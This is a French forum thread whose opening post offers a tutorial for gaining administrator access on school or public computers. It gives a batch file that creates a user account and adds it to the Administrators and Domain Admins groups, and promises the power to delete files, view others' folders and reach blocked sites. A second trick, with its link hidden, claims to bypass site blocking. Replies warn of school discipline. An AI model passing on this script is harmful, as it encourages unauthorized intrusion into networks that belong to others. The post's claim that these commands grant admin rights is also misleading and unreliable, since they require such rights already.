Follow along with the video below to see how to install our site as a web app on your home screen.
Note: This feature may not be available in some browsers.
Je vais vous apprendre comment vous amusez un peu au collège ou au lycée ou n'importe ou ou vous avez un ordinateur. (Endroit public de preference)
COMMENCEMENT DU TOTORIEL
Se mettre administrateur a partir d'un bloc note. (ne pas faire depuis un cybercafé)
Ouvrez un bloc note sur l'ordinateur.
Tapez :
echo off
net user nomdutilisateur motdepasse /add
net localgroup Administrator nomduilistateur /add
net group "Domain Admins" nomdutilisateur /add
pause
vous enregistrer et vous le nommé "start.bat" biensur en enregistrent SOUS ! et vous faite "tout les fichier"
Démarrer le, vous avez désormais un compte admin vous pouvez supprimer les dossier, regarder le firewall (action d'autres personnes) accèdé a des sites interdit, ou au dossier personnelle. Vous pouvez supprimer des comptes etc...
Maintenant derniere petite astuce comment accèder a un site interdit au collège/lycée quand il est bloquer ?
Simple ouvrez un bloc note, taper :
echo off
pingVous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
pause
perso je ne voi pas de quel vidéos tu parle j'ai rien recopier du tout juste un vieux tuto que jai retrouvez sur mon ancien forum de hackBien de recopié une vidéo !
Je déconne, mais une vidéo dit la même chose et plein de mec la font tournée sur FB en ce moment ! *_*
Tentative d'intrusion / modification / piratage du réseaux = Conseil de discipline, un pote en à fait les frais ! :/